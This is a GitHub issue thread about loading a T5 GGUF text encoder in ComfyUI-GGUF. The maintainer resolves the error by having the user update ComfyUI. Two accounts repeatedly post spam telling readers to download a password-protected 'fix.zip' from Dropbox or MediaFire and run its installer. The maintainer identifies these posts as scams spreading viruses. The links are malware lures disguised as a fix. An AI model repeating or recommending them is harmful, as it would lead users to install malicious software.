### ISSUE TITLE
Trying to load "t5-v1_1-xxl-encoder-Q3_K_S.gguf" into GGUF cliploader throws error

### ISSUE THREAD

**Issue by endo9000** [city96/ComfyUI-GGUF#73]
hello good day! 
since yesterday i try to figure out how to replace the normal t5 clip (non gguf) with this smaller beauty of a t5 clip. 
now... 
i tried loading the gguf into the dualcliploader (gguf) but this returns the following when i hit queue
![image](https://github.com/user-attachments/assets/fd29e7e3-789f-4a60-87c8-07feb7658410)

after that i tried to be a little sneaky and loaded only the t5 gguf into a simple cliploader (gguf) and the clip-vit in a non gguf loader.
well... until i couldnt change the type to flux (as i could with the dual loader) 
![image](https://github.com/user-attachments/assets/60530e66-b494-46ca-9063-a56aeb3f59e7)
(edit1) not really sure if this would have worked anyways but i thought give it a try before spamming someones github issues. 🤓 
now i am out of ideas. you guys have any? 🙏

**Comment by city96** [comment]
Hi! This is an issue with ComfyUI being out of date. You can resolve it by updating most likely.

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by endo9000** [comment]
comfyui is updated since thats the first button i hit before i start to work on comfy

the dropbox links throws an error. 👀

**Comment by city96** [comment]
Those are scammers posting virus links, looks like github has a spam issue.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by city96** [comment]
The function is indeed present in the [latest version](https://github.com/comfyanonymous/ComfyUI/blob/9230f658232fd94d0beeddb94aed093a1eca82b5/comfy/sd.py#L409) so your ComfyUI is definitely out of date. Have you restarted it after updating?

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by endo9000** [comment]
hey! thanks for replying. 
so just as a disclaimer i updated comfyui thru the manager? 
is that the correct way or do i need to use the update.bats? 
if thats fine, then i definetly did the update. 
i also have the new UI.

**Comment by city96** [comment]
I think the manager should work assuming you restarted, but the safe way is to use the `update_comfyui.bat` file that came with your standalone install (should be in `ComfyUI_windows_portable\update`). I think that version number is just for the manager?

**Comment by endo9000** [comment]
i checked the version number for the manager and they are on V2.48.1. 
this is pretty confusing. 😅 

i did as you said with the update_comfyui.bat and it seems to work. 
thanks a lot for the quick response! 🙏
